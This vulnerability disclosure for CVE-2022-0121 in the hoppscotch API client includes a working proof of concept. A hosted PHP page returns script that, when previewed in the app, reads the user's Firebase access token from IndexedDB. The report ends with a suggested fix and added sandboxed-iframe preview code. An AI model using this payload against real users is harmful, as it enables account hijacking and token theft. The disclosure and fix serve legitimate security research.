CVE-2022-0121: Exposure of Sensitive Information to an Unauthorized Actor in hoppscotch

hoppscotch is vulnerable to Exposure of Sensitive Information to an Unauthorized Actor

Category: CVE
Tags: xss, web, google, js

Description

Steal the authorization token via XSS and hijack the account

Proof of Concept

Using this attack, an attacker can hijack an account by stealing the authorization header. I see there is team-based collaboration, so one user can hack another user's account using this bug.

Steps

First, host the PHP file below on your web server.

// cors2.php
<?php
// Answer the CORS preflight so the browser lets the app fetch this URL.
if ($_SERVER['REQUEST_METHOD'] === 'OPTIONS') {
    header('Access-Control-Allow-Origin: *');
    header('Access-Control-Allow-Methods: POST, GET, DELETE, PUT, PATCH, OPTIONS');
    header('Access-Control-Allow-Headers: *');
    header('Access-Control-Max-Age: 1728000');
    header('Content-Length: 0');
    header('Content-Type: text/plain');
    die();
}

header('Access-Control-Allow-Origin: *');
header('Content-Type: text/html');

// Response body: rendered as HTML by the preview, the script runs in the app's
// origin and reads the Firebase access token from IndexedDB.
echo '<script>
var dbs = window.indexedDB.open("firebaseLocalStorageDb", 1);
dbs.onsuccess = function (event) {
  var db = event.target.result;
  var tt = db.transaction(["firebaseLocalStorage"]).objectStore("firebaseLocalStorage");
  var tt2 = tt.getAllKeys();
  tt2.onsuccess = function (yy) {
    var keyss = yy.target.result[0];
    var mm = tt.get(keyss);
    mm.onsuccess = function (kk) {
      var xx = kk.target.result.value.stsTokenManager.accessToken;
      alert(xx);
    };
  };
};
</script>';
?>

Let's say your web server URL is http://mysite.com/cors2.php.
Now log in to your account, fetch the above URL, preview the response, and see that the XSS is executed and it fetches the authorization token.

VIDEO POC

https://drive.google.com/file/d/1JLFiL0S9YLYjPNleoTOoQZQOylDfXfwn/view?usp=sharing

SUGGESTED FIX

When previewing as HTML, render it in a sandbox so that it can't access the authorization token. Simply create a div element with the sandbox attribute and render the response there.
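The fix above, as an added example that is not hoppscotch's own code: the sandbox attribute is carried by an iframe, and the key point is to leave out allow-same-origin, so the previewed HTML runs in an opaque origin where indexedDB.open() throws a SecurityError instead of returning the Firebase token store. The renderPreview function takes the Document and container as parameters (an assumption made so the logic can also run outside a browser).

```javascript
// Added example (not hoppscotch's code): render an untrusted response body in a
// sandboxed iframe so the preview runs in an opaque origin with no access to the
// app's IndexedDB, localStorage or cookies.

// Sandbox value for the preview frame. 'allow-same-origin' is never included:
// with it the frame would share the app origin and could open
// firebaseLocalStorageDb exactly as the PoC does. An empty value applies every
// restriction; allow-scripts alone still leaves the origin opaque.
function previewSandboxValue({ allowScripts = false } = {}) {
  return allowScripts ? 'allow-scripts' : '';
}

// Defence in depth: reject any sandbox value that would grant the app origin.
function isSafeSandbox(value) {
  const tokens = value.split(/\s+/).filter(Boolean);
  return !tokens.includes('allow-same-origin');
}

// Attributes for the preview frame. srcdoc hands the HTML to the frame's own
// parser; it is never inserted into the app document via innerHTML.
function previewFrameAttributes(html, opts) {
  return {
    sandbox: previewSandboxValue(opts),
    srcdoc: html,
    referrerpolicy: 'no-referrer',
  };
}

// doc: the Document to create the frame in; container: the element that shows
// the preview. Returns the iframe that now holds the untrusted HTML.
function renderPreview(doc, container, html, opts) {
  const attrs = previewFrameAttributes(html, opts);
  if (!isSafeSandbox(attrs.sandbox)) {
    throw new Error('preview frame must not have allow-same-origin');
  }
  const frame = doc.createElement('iframe');
  for (const [name, value] of Object.entries(attrs)) {
    frame.setAttribute(name, value);
  }
  container.replaceChildren(frame);
  return frame;
}

// Browser usage: renderPreview(document, document.getElementById('preview'), responseBody);
```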

Impact

Full account hijack by stealing Authorization token
